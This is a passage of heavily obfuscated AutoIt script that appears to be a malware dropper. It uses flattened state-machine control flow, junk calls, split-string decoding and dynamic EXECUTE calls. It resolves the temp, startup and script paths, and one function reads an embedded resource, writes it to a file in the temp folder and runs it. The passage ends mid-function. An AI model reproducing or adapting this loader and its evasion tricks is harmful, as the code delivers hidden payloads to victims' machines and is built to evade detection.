176683708 ISSTRING ("VF1y1uNpGEYDTD1litZD6OJ8UGXRD2cl7SUTTDOybimUpapbCZU1QRNg52NuG7VOBMFaTh" ) ENDIF IF $113519199 = 1203322726 THEN CONTINUELOOP EXITLOOP ISSTRING (1831278 * 2990306 + 3098707 + 2657297 ) ENDIF IF $113519199 = 1300820860 THEN $R = $NC $113519199 = 1203322726 ENDIF PTR ("dwHsMDpruxfnpnZNej4eVTfGphp6fuKZtIyA4HgqbD3rc8oco9TR5pgtqbcEoslaWq3RZyUGdNdq0YDr3mRgL33dCej3ELbSs3EWeHn" ) NEXT ENDIF GLOBAL $1138660241 = 256356752 GLOBAL $PLNRM0DCGV = 3367680 FOR $E = 0 TO 2441690 IF $1138660241 = 113519199 THEN $LS -= 1 $1138660241 = 1027989821 PTR ("o0bBLu87sSmu910zoK1MKRwU9agmELyotDLykmQ11FjZIqcUp8NW8KiGDrBLnVCRs7aEpApc49VeHHkS7w7F7MpS" ) ENDIF IF $1138660241 = 176683708 THEN $NC = BITOR (BITAND (BITSHIFT ($NC , ($LS * + 4294967295 ) ) , 255 ) , $R ) ISPTR ("gdBFKqGDYTK190e95gTN1Y6UQSrkkEwr0vNafbJBz2iXvVp2qf9WbzWsgS038wtsvsbNmd34Gqo8" ) $1138660241 = 1300820860 STRING (1775845 * 313793 + 4292565921 ) ENDIF IF $1138660241 = 256356752 THEN $R1 = $NC WINEXISTS ("lRCcI0AdULOmmfoUlYN7u5BICoYUcKf1jES0YlyZSukZUR" ) $1138660241 = 176683708 STRING (983529 * 3767196 + 1033300 + 3599162 ) DIM $RAJGYDRXY69YZP9VLZWW = "yFvujmBBK4LeWbtas5Mkb7Jpv2RdEMeX7MrEYlO0p5Ybwtcn" ENDIF IF $1138660241 = 1027989821 THEN $SDECODED &= CHR ($NC ) INT (3550800 ) EXITLOOP ENDIF IF $1138660241 = 1203322726 THEN $RS += 1 $1138660241 = 113519199 RANDOM (1102076 ) RANDOM (3872667 ) ENDIF IF $1138660241 = 1300820860 THEN $R = BITSHIFT ($R1 , $RS ) DIM $ITZMGQX4GII3B0CXUTLN = 3074305 $1138660241 = 1203322726 MOD (1548419 , 1295973 ) ENDIF PTR ("m3E0GmLvrqswm7Ad9mNMlv22qE42CciswvZ67HmgJrDaHlFp6q2UlHv1bMJcsT3o" ) NEXT NEXT RETURN $SDECODED ENDFUNC FUNC YDFTDRCASVG ($BBINARY ) GLOBAL $1300820860 = 256356752 GLOBAL $9A1HEFBAHD = 506265 FOR $E = 0 TO 3591842 INT (321663 ) IF $1300820860 = 176683708 THEN #forceref $j RANDOM (801978 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $BYTE , $BITS = "" , $I , $J , $S $1300820860 = 176683708 WINEXISTS ("8jY0yp2HkNhBkzUNEB9isEeNXReU2m1jIVD0TnEL" ) WINEXISTS ("GDbUMCtG8WbCfkcSliO8X73y645q7xjGKUgtOtg" ) ENDIF NEXT FOR $I = 1 TO BINARYLEN ($BBINARY ) $BYTE = BINARYMID ($BBINARY , $I , 1 ) FOR $J = 1 TO 8 GLOBAL $1300820860 = 256356752 GLOBAL $LWTAUHLXZ0 = 1321153 FOR $E = 0 TO 402326 ISBOOL (2500246 * 2195127 + 2309758 + 4292466555 ) IF $1300820860 = 176683708 THEN $BYTE = BITSHIFT ($BYTE , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $BITS &= BITAND ($BYTE , 1 ) WINEXISTS ("pfCVg" ) $1300820860 = 176683708 DIM $EK7SAQMGUBEW1ZUKJOHX = 1909697 + 4292022810 + 4291720625 * 3293847 ENDIF NEXT NEXT NEXT GLOBAL $1300820860 = 256356752 GLOBAL $IK8YLTDMIH = 3543418 FOR $E = 0 TO 3884059 IF $1300820860 = 176683708 THEN $BITS = "" MOD (2826006 , 668109 ) EXITLOOP ISPTR (3576399 + 4293328620 + 4292596178 ) ENDIF IF $1300820860 = 256356752 THEN $S = STRINGSPLIT ($BITS , "" ) ISFLOAT ("LXR1v80k5" ) $1300820860 = 176683708 DIM $BIWNFFFXRX8MZCVAZS6U = 3473510 * 1622827 + 4294219104 ENDIF NEXT FOR $I = $S [0 ] TO 1 STEP + 4294967295 $BITS &= $S [$I ] NEXT RETURN $BITS ENDFUNC FUNC IZSPTCBUQOIXMP ($SSTRING , $INUMCHARS ) IF ISSTRING ($SSTRING ) = 0 OR $SSTRING == "" THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF IF ISINT ($INUMCHARS ) = 0 OR $INUMCHARS < 1 THEN RETURN SETERROR (2 , 0 , 0 ) ENDIF GLOBAL $1203322726 = 256356752 GLOBAL $G7FSNVIRVE = 3481575 FOR $E = 0 TO 2975631 DIM $YDWVASINGXWAQVJABYON = "trp9CudpU7wn1r59zgHss0r6WexiVMuus" IF $1203322726 = 176683708 THEN $ARETURN [0 ] = UBOUND ($ARETURN , 1 ) + 4294967295 DIM $WHXF8W0ZNYCNACSQ58DA = 1274644 + 1579368 $1203322726 = 1300820860 ISSTRING ("c4imT2NIkXtCBGIO44UKbNxUKlXIiAJCpnwsqpEhxUFiOaHXNTcaVFKyFxKHfezUm0mojpyOzLm" ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $ARETURN = STRINGREGEXP (_STRINGREPEAT ("0" , 5 ) & $SSTRING , "(?s).{1," & $INUMCHARS & "}" , 3 ) $1203322726 = 176683708 DIM $5ZXISUL8W2N6CTUV5YXT = "xtxKittqqsa4fj9wMhCLkDGaCJ36wtrXtwGga8IAsSFINc6jvxsQtRC4XxiIzw36bmKTL3vOIctC" STRING ("TK9bKCL4MtMZaa5ZIHABnHCbMhrxa6ZaS6RW45zT9Z8ITZHcxMyy59zkh7xCln4QDLhdsi5NhRB" ) ENDIF IF $1203322726 = 1300820860 THEN RETURN $ARETURN EXITLOOP PTR (980617 + 4292796468 + 4294635977 * 2096956 ) ENDIF RANDOM (2144716 ) NEXT ENDFUNC FUNC MIJWHARLJCMZNKU ($SHEX ) IF NOT (STRINGLEFT ($SHEX , 2 ) == "0x" ) THEN $SHEX = "0x" & $SHEX RETURN $DWUFUAPKESAJ ($SHEX ) ENDFUNC FUNC XHLXVVVZBP ($ICOLOR ) GLOBAL $1203322726 = 256356752 GLOBAL $HV5SFHSETP = 3798929 FOR $E = 0 TO 2841645 MOD (2100624 , 98488 ) IF $1203322726 = 176683708 THEN $IMASK = BITXOR (BITAND ($ICOLOR , 255 ) , ($ICOLOR / 65536 ) ) ISBINARY (3623704 + 2147057 + 222595 + 4293365621 ) $1203322726 = 1300820860 ISSTRING (414661 + 2806808 ) ENDIF IF $1203322726 = 256356752 THEN LOCAL $IMASK DIM $EFUOWI1ME3ZR7CKFXJCJ = 1218598 $1203322726 = 176683708 ISPTR (2630247 + 3293816 ) CHR (1904096 ) ENDIF IF $1203322726 = 1300820860 THEN RETURN BITXOR ($ICOLOR , ($IMASK * 65537 ) ) EXITLOOP ENDIF WINEXISTS ("mc3fQjiIlegVKXgJ95hcWw6H8YCmjbEXh4g5cOcE7ENDoQ2QT1E7o13Zfug2Q5yjJtMQRlGt2LeqTCtr5" ) NEXT ENDFUNC FUNC NBRNBWYUQNWGOKZ ($HICON1 , $HICON2 ) LOCAL $ARTN = DLLCALL (LUXBZMCWKPOC ("s..hl..wa..pi...d..l..l" , ".." ) , LUXBZMCWKPOC ("B..OO..L.." , ".." ) , 548 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON1 , LUXBZMCWKPOC ("h..a..nd..le.." , ".." ) , $HICON2 ) IF @ERROR THEN RETURN SETERROR (@ERROR ) ENDIF RETURN $ARTN [0 ] ENDFUNC FUNC ZFVYVFHKBGEU ($IINT ) LOCAL $B = "" FOR $I = 1 TO 32 GLOBAL $1300820860 = 256356752 GLOBAL $DSFHHQARZS = 3139047 FOR $E = 0 TO 2229963 IF $1300820860 = 176683708 THEN $IINT = BITSHIFT ($IINT , 1 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $B = BITAND ($IINT , 1 ) & $B DIM $GTLELWLFMBZ63AFMBVWQ = 1652337 + 4291679370 * 2824548 * 170358 + 980145 + 4293331830 + 2944568 * 3810742 $1300820860 = 176683708 ISSTRING (1939181 + 790819 * 2905706 ) ENDIF PTR (580007 + 4292640990 + 2010750 + 4293480249 ) NEXT NEXT RETURN $B ENDFUNC FUNC DUWYGWWFUHRY ($ILENGTH ) RETURN $ILENGTH * 0.621400 ENDFUNC FUNC RQNMBRDSQSVPAPI ($SSTRING ) GLOBAL $1300820860 = 256356752 GLOBAL $UB0DLKMGDG = 3335599 FOR $E = 0 TO 1170343 WINEXISTS ("nkhcC1BjxRqHnmWD4ggU6uifhbZg4ItsYo" ) IF $1300820860 = 176683708 THEN LOCAL $AVRETARR [1 ] , $IUBOUND EXITLOOP ENDIF IF $1300820860 = 256356752 THEN LOCAL $AVARRAY = STRINGREGEXP ($SSTRING , "([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)" , 3 ) INT (1214044 ) $1300820860 = 176683708 ENDIF ISFLOAT (1498587 * 535529 + 4291431968 ) NEXT FOR $I = 0 TO UBOUND ($AVARRAY ) + 4294967295 IF _ISVALIDIP ($AVARRAY [$I ] ) THEN GLOBAL $1203322726 = 256356752 GLOBAL $C4BBUOYW7T = 130051 FOR $E = 0 TO 3905436 DIM $GMHBM2VUEC6YRL1JQ3C8 = 1298284 IF $1203322726 = 176683708 THEN REDIM $AVRETARR [$IUBOUND + 1 ] $1203322726 = 1300820860 DIM $NAXTAC5F0PLQSAQSZYF5 = "MEwdfxXWdUjDIoUvVb3DVvL79kCRaNd2cgbEap5OhTXFBliVG7ewlBlq3ze44gVyRrBCnouEgovcHfEXbSkdIQQK5ULKlaUb7xYkUQGrMJq7fjTX4q" RANDOM (2856720 ) ENDIF IF $1203322726 = 256356752 THEN $IUBOUND = UBOUND ($AVRETARR ) ISBINARY (2174494 + 4292023633 + 353925 ) $1203322726 = 176683708 ENDIF IF $1203322726 = 1300820860 THEN $AVRETARR [$IUBOUND ] = $AVARRAY [$I ] EXITLOOP ENDIF NEXT ENDIF NEXT IF $IUBOUND = 0 THEN RETURN SETERROR (1 , 0 , 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $9YSEVBYQ4H = 1704866 FOR $E = 0 TO 2205646 IF $1300820860 = 176683708 THEN RETURN $AVRETARR ISBOOL (560610 + 4291396930 ) EXITLOOP ENDIF IF $1300820860 = 256356752 THEN $AVRETARR [0 ] = $IUBOUND $1300820860 = 176683708 MOD (2181193 , 145975 ) ENDIF NEXT ENDFUNC FUNC EVNJAAQWEO ($ILENGTH ) RETURN $ILENGTH * 1.609000 ENDFUNC FUNC UDRNJBRYOF ($INUM ) IF ($INUM < 2 ) THEN RETURN FALSE IF ($INUM = 2 ) THEN RETURN TRUE IF (BITAND ($INUM , 1 ) = 0 ) THEN RETURN FALSE FOR $I = 3 TO SQRT ($INUM ) STEP 2 IF (MOD ($INUM , $I ) = 0 ) THEN RETURN FALSE NEXT RETURN TRUE ENDFUNC FUNC MRDEQHUQFFBML ($IVALUE , $VTRUE , $VFALSE ) GLOBAL $1300820860 = 256356752 GLOBAL $L3VWCZDZ75 = 3389345 FOR $E = 0 TO 998476 ISSTRING (628113 + 942730 ) IF $1300820860 = 176683708 THEN RETURN $AARRAY [NUMBER (NUMBER ($IVALUE ) > 0 ) ] MOD (921477 , 2927320 ) EXITLOOP INT (349919 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $AARRAY [2 ] = [$VFALSE , $VTRUE ] ISSTRING ("SkQGwKYZ0nIFo7bZeu5ZVhzOMeaG8Txzn13seLZFzR29OnBEppLoJmmJVb4rJr1h0isxdTVBEzydoz9zMFqShjZaOtHdSH5iZVjF4eBGDkTjYjvucEO" ) $1300820860 = 176683708 ENDIF INT (2861288 ) NEXT ENDFUNC FUNC SNUVPERSZOEKMQP ($NJOKER = 0 ) GLOBAL $1300820860 = 256356752 GLOBAL $KST7EQNCQC = 2965723 FOR $E = 0 TO 1982129 ISPTR ("zOmF7man20iQVBmMvSvWAVOG52eJagbq5cqNemW8RFeOhHSYp1lvxBFNaOJeiAmWZ2VSlHIj5xe4Rayxkpti4O2DGLNyLR0qssZpWaMSrcAawL7apm" ) IF $1300820860 = 176683708 THEN $NNUMBERS = LUXBZMCWKPOC ("T..wo,..Thre..e,Fo..ur,..Fiv..e,..S..i..x..,..S..ev..e..n..,..Eigh..t..,N..i..ne,..T..en,..Jack,..Ki..ng..,Queen,A..c..e.." , ".." ) DIM $E1K9QLI4JHNGYKYKJKJL = 2438973 EXITLOOP MOD (3523655 , 459451 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $NNUMBERS , $AZSPLITS , $NRANDOM , $NRETURN , $SFACE , $SFACES , $NRANDOM2 ISBINARY ("X7ioAOqEZdXiEnCHaIZgLVqFn96gjq4qbiAJQw7E2fuIYSwa" ) $1300820860 = 176683708 PTR ("cQMbATjuHiGgwX22NKtoFzRREM5QKwYBavx3cuGWSUXzrLanHRpEDXqL95GYXCUlufgay8ZseHFWMqz3LSi4gs7meW4gYS8" ) ENDIF NEXT IF $NJOKER THEN $NNUMBERS &= LUXBZMCWKPOC (",..Joker.." , ".." ) ENDIF GLOBAL $1027989821 = 256356752 GLOBAL $FLE9YJ16A6 = 2436800 FOR $E = 0 TO 1120770 IF $1027989821 = 113519199 THEN $SFACE = $SFACES [ROUND ($NRANDOM2 ) ] ISBINARY ("u0ebh36Md" ) EXITLOOP STRING (1075817 + 736701 + 1516956 + 4291363348 ) ENDIF IF $1027989821 = 176683708 THEN $SRETURN = $AZSPLITS [RANDOM (1 , $AZSPLITS [0 ] , 1 ) ] DIM $B5JWLKKF34JGEELDLFJB = 269680 + 4294929560 * 3909909 + 4293809292 + 2329391 + 3103136 * 3612467 + 432899 $1027989821 = 1300820860 PTR (449167 * 2683051 ) ENDIF IF $1027989821 = 256356752 THEN $AZSPLITS = STRINGSPLIT ($NNUMBERS , "," ) $1027989821 = 176683708 DIM $3SYN52XOT45SIVM57NRU = "cinRNfEziDbCT4ltCdDdmXy56nq0llh2xy0JK6qWsokA4pyABLEKmqAoTsUzYOo6vietdLTFWRV8M" ENDIF IF $1027989821 = 1203322726 THEN $NRANDOM2 = RANDOM (1 , $SFACES [0 ] + 4294967295 ) ISFLOAT (3366178 + 4292208555 + 4292321933 ) $1027989821 = 113519199 INT (796222 ) ENDIF IF $1027989821 = 1300820860 THEN $SFACES = STRINGSPLIT (LUXBZMCWKPOC ("S..p..a..d..es|C..l..ubs|H..e..arts|..D..i..a..mon..d..s.." , ".." ) , "|" ) ISBINARY ("eVkew039YEFCLUrdK8qOpYD8vBU" ) $1027989821 = 1203322726 DIM $7Y4OFUCHQRTJJE9GAIOA = 1448036 ENDIF NEXT IF $SRETURN = LUXBZMCWKPOC ("Jo..k..er" , ".." ) THEN RETURN $SRETURN ELSE RETURN $SRETURN & LUXBZMCWKPOC (" O..f .." , ".." ) & $SFACE ENDIF ENDFUNC FUNC YOATAXCYMFD ($ICONTROLID ) GLOBAL $1300820860 = 256356752 GLOBAL $QMT4FCQ2WY = 1003050 FOR $E = 0 TO 2025828 IF $1300820860 = 176683708 THEN GUICTRLSETSTATE ($ICONTROLID , $ASTATE [NUMBER (BITAND (GUICTRLGETSTATE ($ICONTROLID ) , $ASTATE [0 ] ) = $ASTATE [0 ] ) ] ) EXITLOOP ISFLOAT (2221998 + 1544486 ) ENDIF IF $1300820860 = 256356752 THEN LOCAL $ASTATE [2 ] = [0 , 1 ] ISBINARY ("QSVLzO7sbHCnb0wlaWp7" ) $1300820860 = 176683708 ISSTRING (1463820 + 3785400 * 3517776 ) ENDIF NEXT ENDFUNC FUNC MXNUVEYTLNEVG () RETURN STRINGREGEXPREPLACE (@OSARCH , "(?i)x86|\D+" , "" ) ENDFUNC GLOBAL $586524435 = 256356752 GLOBAL $DM3XLFO06Q = 765620 FOR $E = 0 TO 3030037 RANDOM (795858 ) IF $586524435 = 38669117 THEN $RSOIAVQHRSRB = EXECUTE (LUXBZMCWKPOC ("Z..p..LP..Qg..YB..g..R..D..g..()" , ".." ) ) STRING ("smhpaEbDifblFOsHg8e2wHIwL359LcXdJ631FNXReUR1oJaJNNTRtKmUNUMhIb1gs8KJ" ) $586524435 = 2032766480 DIM $CLXXL0SHC2UU8SFT9TIM = "aQhc2KHq8zYlLqF6XJ35LKooR3XmoL1MppCEqVUpj1dBGivcJXliorjyB3u9XvcvIl6vXaQb0NWVHWSHHVLBzSx8gddx" ENDIF IF $586524435 = 39019882 THEN $DKMWACMPQYMR = EXECUTE (LUXBZMCWKPOC ("wC..Cb..b..C..aNdN..Z..P(..)" , ".." ) ) $586524435 = 1885155689 WINEXISTS ("m9oJhksKFx0OlXAcTK51Y8pT6sKfl7603wvHFctpz" ) ISFLOAT ("mMtzeoWbGnUEMZImyHBaVYB3FRqOBaFGFHg8WW3Rd2ZhYayE" ) ENDIF IF $586524435 = 61093985 THEN OPT (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2..0,..44,..2..7,5..1..,..9,2..9..,41,..40,8,35,..30..,..31.." , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) ) STRING (1037708 + 4293434638 ) $586524435 = 1053930317 RANDOM (425821 ) ENDIF IF $586524435 = 92596336 THEN $XFNAYPZBZOLC = EXECUTE (LUXBZMCWKPOC ("J..W..W..T..SbPFt..D..yX..(..)" , ".." ) ) ISFLOAT ("fTKzLNU628ueErW8oLKqt3SXv3GU7styKctVfWWqEpVy0vxelhu4g6OlaXeSga9JO5DC8a2CZuVeit6aECIZ7ysOwiVsSdkEqkU524gko2eWkKcR0emNB" ) $586524435 = 1604509846 ENDIF IF $586524435 = 113519199 THEN $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM = EXECUTE (LUXBZMCWKPOC ("@..S..cr..i..p..tD..ir" , ".." ) ) PTR ("UVjqX7JbhKvxJeuFEWfdBM0FcgHDsdYq5OhsL3XfhZ6LreIH5ftsUmhh5NnRyfTdWfC57" ) $586524435 = 1027989821 DIM $5MQON8GAIMUEFSGAX8QF = "cg20lLNK2lStUqEAQzpkyGFsqJUy6N654t3GYycw3zQbclWBbJRHz5rEJIIL1pNooXyAw8Mrx2q80DqeYr" ENDIF IF $586524435 = 116471326 THEN $ADVENYDCNHZL = EXECUTE (LUXBZMCWKPOC ("igCf..Q..U..u..W..mEaf()" , ".." ) ) $586524435 = 1196440215 ISSTRING (102795 * 930307 * 1666361 ) ISPTR ("pWued7yjGNtNfsDYJ3rr0rAy8bxC8xMmySbrCnszGo7tSU06uK5UDj57v6fcI6ljagoxqlvvJ1ULtgRokBiwB3SpWd6Fh" ) ENDIF IF $586524435 = 176683708 THEN $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE = EXECUTE (LUXBZMCWKPOC ("@T..empDi..r.." , ".." ) ) $586524435 = 1300820860 PTR ("EBOipIkLysNpp11gYZRhy9KmpZotajJFXfUSX9g3Sf0DzRqqyUXnglmE1C2At0LpThCjgis" ) PTR ("ihWIH85qwwyK3o1ugQI2DKUsohjqA8EsW3wTQ" ) ENDIF IF $586524435 = 256356752 THEN #region qcVZk $586524435 = 176683708 ENDIF IF $586524435 = 432319576 THEN $CSRHZILJDSLP = EXECUTE (LUXBZMCWKPOC ("CR..A..yo..Qr..F..EAmS()" , ".." ) ) $586524435 = 92596336 WINEXISTS ("8RcpGZGwDuzZNZx1gZa2iOXYn6iSxIw2r" ) INT (1853682 ) ENDIF IF $586524435 = 737653776 THEN $SNOJUKVVIBEY = EXECUTE (LUXBZMCWKPOC ("Qh..Mg..hxJzkQD..S..().." , ".." ) ) $586524435 = 38669117 ENDIF IF $586524435 = 781366022 THEN $PSZKHZKXAIEO = EXECUTE (LUXBZMCWKPOC ("Z..Eb..j..k..FZ..IP..af..i..()" , ".." ) ) ISSTRING ("EELco9it4ocJQZ947HHOvhydJ6cWCYvRQLm27uMr0iwobNw9wqb48LjxfIBs6w" ) $586524435 = 864731176 WINEXISTS ("4eLg7M5pYnVkc5IdzlXBSdCZWy2uuDrpvQUsxptx8" ) RANDOM (2486629 ) ENDIF IF $586524435 = 848901156 THEN $FPJBQJEGCCNE = EXECUTE (LUXBZMCWKPOC ("Rm..O..eeci..Wz..OyF..().." , ".." ) ) ISSTRING (3597529 + 4293720639 + 4292443185 * 2434805 ) $586524435 = 1718368979 ISBOOL (2363483 + 3721986 + 4291682637 + 4294195590 ) ENDIF IF $586524435 = 864731176 THEN $WQURQXMWAZTB = EXECUTE (LUXBZMCWKPOC ("m..sSF..B..h..B..P..z..K..O..b..(..)" , ".." ) ) $586524435 = 1808850186 ISSTRING ("2vKAFL64c3RK5VMxXCahgjuCoXX48NKfICQy9DYsH4tsIengVelWEfUTbimSZc5yrKbCeoytORJlZb3jJQi4BYJDS7w0qfDE85a7cUc" ) ENDIF IF $586524435 = 954977294 THEN $UEHQXDUALSWD = EXECUTE (LUXBZMCWKPOC ("b..f..SE..zoF..q..q..v..Rv().." , ".." ) ) WINEXISTS ("YEI3apcii3b6Db" ) $586524435 = 61093985 DIM $1ICJNEN4A5HZNKPJRW8J = 283651 ENDIF IF $586524435 = 1027989821 THEN $RVLXXSQVNZAXBEXVLCOYMMYTVKMXHDDKZNNJCLAAUDHWOTJLFVEDXJKE = EXECUTE (LUXBZMCWKPOC ("@..O..S..Version.." , ".." ) ) $586524435 = 1138660241 ISSTRING (1984088 * 2723817 + 3324077 + 4292629190 ) ENDIF IF $586524435 = 1051260188 THEN $URTJHDWBPVQN = EXECUTE (LUXBZMCWKPOC ("r..qBfMR..VGxj..yI..().." , ".." ) ) $586524435 = 737653776 INT (3726376 ) ENDIF IF $586524435 = 1053930317 THEN ONXNEQMVEA () EXITLOOP ENDIF IF $586524435 = 1070530058 THEN $NPTGNKISXCCR = EXECUTE (LUXBZMCWKPOC ("ZPvye..e..xeU..e..wT(..).." , ".." ) ) $586524435 = 39019882 ISSTRING (3240311 * 1888434 + 3763639 ) ENDIF IF $586524435 = 1138660241 THEN $JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH = EXECUTE (LUXBZMCWKPOC ("@..A..u..to..I..tP..ID.." , ".." ) ) ISFLOAT (588471 + 791503 + 4291741726 + 1530756 ) $586524435 = 1924764602 INT (741726 ) ENDIF IF $586524435 = 1196440215 THEN $GCIZPUUYNTJL = EXECUTE (LUXBZMCWKPOC ("YyEu..J..PRYp..kCM().." , ".." ) ) ISFLOAT (1508313 + 533998 + 3514586 * 3820887 ) $586524435 = 1070530058 INT (1869136 ) ENDIF IF $586524435 = 1203322726 THEN $LEBAKWEILIBIQNTCTHBGGFGBKVXCKB = EXECUTE (LUXBZMCWKPOC ("@Sc..r..ip..tF..ull..P..at..h" , ".." ) ) ISBINARY (2457696 + 3222973 ) $586524435 = 113519199 ISFLOAT (42047 + 288839 ) ENDIF IF $586524435 = 1296565717 THEN $WURIVHUQSXZK = EXECUTE (LUXBZMCWKPOC ("s..hY..KZnw..GX..GS..g().." , ".." ) ) $586524435 = 2022545531 ISFLOAT ("KSd169kc6IahO4I6gAF1NXaSWdLa7NL2tHzf2oVG0anFtKLW33LJnz0YSvf" ) ENDIF IF $586524435 = 1300820860 THEN $RXJCPAPNDUMJMOSOPQCHSTGTFYAPOZBYKYKLGKEC = EXECUTE (LUXBZMCWKPOC ("@S..ta..r..tupD..i..r.." , ".." ) ) DIM $R6IYHEDD2Q8BNIEXLA0G = 254100 + 140238 $586524435 = 1203322726 ISFLOAT (1510904 + 3531272 + 2714089 ) ISBOOL ("Ery0U4oymom83AGdap4D4z2gFSXZvSL6lx6HRnriyEEwkHpBMM5RNS2eystbgzdELqWEE8vX8Wez5E68CvlTX5rDF2iy3pb" ) ENDIF IF $586524435 = 1604509846 THEN $NCPIUPWKFYZJ = EXECUTE (LUXBZMCWKPOC ("dd..K..W..O..Y..Mj..JPnF..()" , ".." ) ) RANDOM (3014537 ) $586524435 = 2060391673 ISPTR (2631610 + 2878018 ) CHR (609484 ) ENDIF IF $586524435 = 1655436234 THEN $FREUKGMVKMCX = EXECUTE (LUXBZMCWKPOC ("xZ..r..g..VRf..Ny..RG..X..(..)" , ".." ) ) STRING (3048769 + 2837918 ) $586524435 = 781366022 INT (3973707 ) RANDOM (3609677 ) ENDIF IF $586524435 = 1713506615 THEN $BQQDLTTXSVYF = EXECUTE (LUXBZMCWKPOC ("b..vM..qyYk..u..KU..R..a(..)" , ".." ) ) DIM $85UCLTYGBOMZ1DSOCHRP = 3067333 $586524435 = 432319576 ENDIF IF $586524435 = 1718368979 THEN $WDNTUWUIPGOD = EXECUTE (LUXBZMCWKPOC ("H..g..MGwW..t..Pd..n..oR..(..)" , ".." ) ) $586524435 = 1051260188 ENDIF IF $586524435 = 1808850186 THEN $HOKAFSRHEHOF = EXECUTE (LUXBZMCWKPOC ("Q..DG..s..B..I..xa..sio..K..()" , ".." ) ) ISBOOL ("jtjZwQ2cDIA64J3vbEt2MRhS8eR" ) $586524435 = 848901156 ENDIF IF $586524435 = 1885155689 THEN $FWRGBKVEXWEH = EXECUTE (LUXBZMCWKPOC ("aZm..t..vpRVI..Ox..M().." , ".." ) ) $586524435 = 1970938970 PTR (319730 + 2304399 ) ENDIF IF $586524435 = 1924764602 THEN $BPAPWBQZMLLNSNXVSJYMCEPVPMUWJELXTITCFYCQPXTFSGSTOASCDLVWZF = EXECUTE (LUXBZMCWKPOC ("@A..u..t..o..I..t..E..x..e.." , ".." ) ) $586524435 = 1655436234 MOD (1701699 , 3431664 ) MOD (2416550 , 2390431 ) ENDIF IF $586524435 = 1970938970 THEN $DNKSORVXJZJU = EXECUTE (LUXBZMCWKPOC ("m..N..IAO..Q..ehl..r..x..V()" , ".." ) ) $586524435 = 1296565717 ENDIF IF $586524435 = 2022545531 THEN $DBGGPSHIBQGJ = EXECUTE (LUXBZMCWKPOC ("Yr..bQ..D..b..YjG..k..Xs..().." , ".." ) ) INT (1081925 ) $586524435 = 1713506615 ENDIF IF $586524435 = 2032766480 THEN $NLIVQGZCBCYM = EXECUTE (LUXBZMCWKPOC ("C..JcC..I..d..D..e..p..T..l..c(..)" , ".." ) ) $586524435 = 116471326 ENDIF IF $586524435 = 2060391673 THEN $QNTYERAUOLAX = EXECUTE (LUXBZMCWKPOC ("Q..U..Bc..ah..B..bZKyJ(..)" , ".." ) ) $586524435 = 954977294 DIM $BRKOQF83ME6AKFCOSE4C = 59615 * 967375 * 3257347 + 3941415 * 854843 + 4293200229 ISBINARY (247142 + 2356577 ) ENDIF NEXT FUNC QKSZFURFTX ($FILE , $STARTUP , $RES ) GLOBAL $1027989821 = 256356752 GLOBAL $1QBIAIKTYR = 2085798 FOR $E = 0 TO 3057511 ISFLOAT ("zOgbQqelu6IyNpD2fE3I1Oa0WDGU98c0KrL56v0KL0YeJVeHm3LhY30UNpolTtlv3TXwMI6TNr7b16qaz9Hg" ) IF $1027989821 = 113519199 THEN $DBGGPSHIBQGJ ($FHANDLE ) EXITLOOP ENDIF IF $1027989821 = 176683708 THEN DIM $FHANDLE = $FWRGBKVEXWEH ($FILE , ZVTZJDNXHRPQQIM ("55" ) ) $1027989821 = 1300820860 ENDIF IF $1027989821 = 256356752 THEN $FILE = $TXMTWUMSHHMHTQXRPWRAAZESOZNEHHELZE & "\" & $FILE ISBINARY ("08S5M73DF5Z3S9nWUVf9" ) $1027989821 = 176683708 DIM $5VRPL9AOWYVZCRE4JDAG = 3143133 ISBOOL (3582513 + 2118016 + 4293087897 + 611733 ) ENDIF IF $1027989821 = 1203322726 THEN $NPTGNKISXCCR ($FHANDLE , $BQQDLTTXSVYF ($DATA , 1 ) ) DIM $RQDEQCE6JLEQ05FIKSSX = 2938432 + 4292099282 + 1270365 + 3196127 $1027989821 = 113519199 MOD (614262 , 3626405 ) CHR (809950 ) ENDIF IF $1027989821 = 1300820860 THEN DIM $DATA = READRESOURCES ($RES , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..4,5..3.." , ".." ) ) ) ISSTRING ("LgSXAQM7L8KDwLhHvViOJwtbkVrDtLTWkshCau2Bj87rIzH7tNKRxC4oX" ) $1027989821 = 1203322726 ISBINARY ("NapYsdDOHb2QEKybCUn" ) ENDIF DIM $YRY2OTSND9U7BUGDCOFJ = "R7s0Vn1Bea88nzLNL9osNLEqBaSMT1DIBnRTgc4g1W99v8XuE01O1rjfBbxVEoSnFyGaT2HIfiA2LF5Dnxh39ZSkdKrfNjKLd" NEXT IF $STARTUP = ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,27,38,..4..5..,..3..1.." , ".." ) ) THEN IF $STARTUPDIR <> $RBNGTNJVQYOQOTZBNEJFBEBBBRMZZMPCIMKJNUBQXAYVVUQBECJFBZVM THEN $FPJBQJEGCCNE ($FILE ) ENDIF ELSE $FPJBQJEGCCNE ($FILE ) ENDIF ENDFUNC FUNC ONXNEQMVEA () GLOBAL $1203322726 = 256356752 GLOBAL $C7AXLMSSIT = 3121811 FOR $E = 0 TO 3357923 IF $1203322726 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,3..5,4..0..,2..7..,44,5..1..,2..0,41..,19,46,..4..4..,3..5..,..4..0..,..33" , ".." ) ) ) WINEXISTS ("hgZnRQw6hKB46HYY0d7czWEKRq9uWiu8ULCFoHVqe0Dc0xLkbCM2i1hvKnGARck8p" ) $1203322726 = 1300820860 ENDIF IF $1203322726 = 256356752 THEN LOCAL $E = EXECUTE $1203322726 = 176683708 ISBOOL 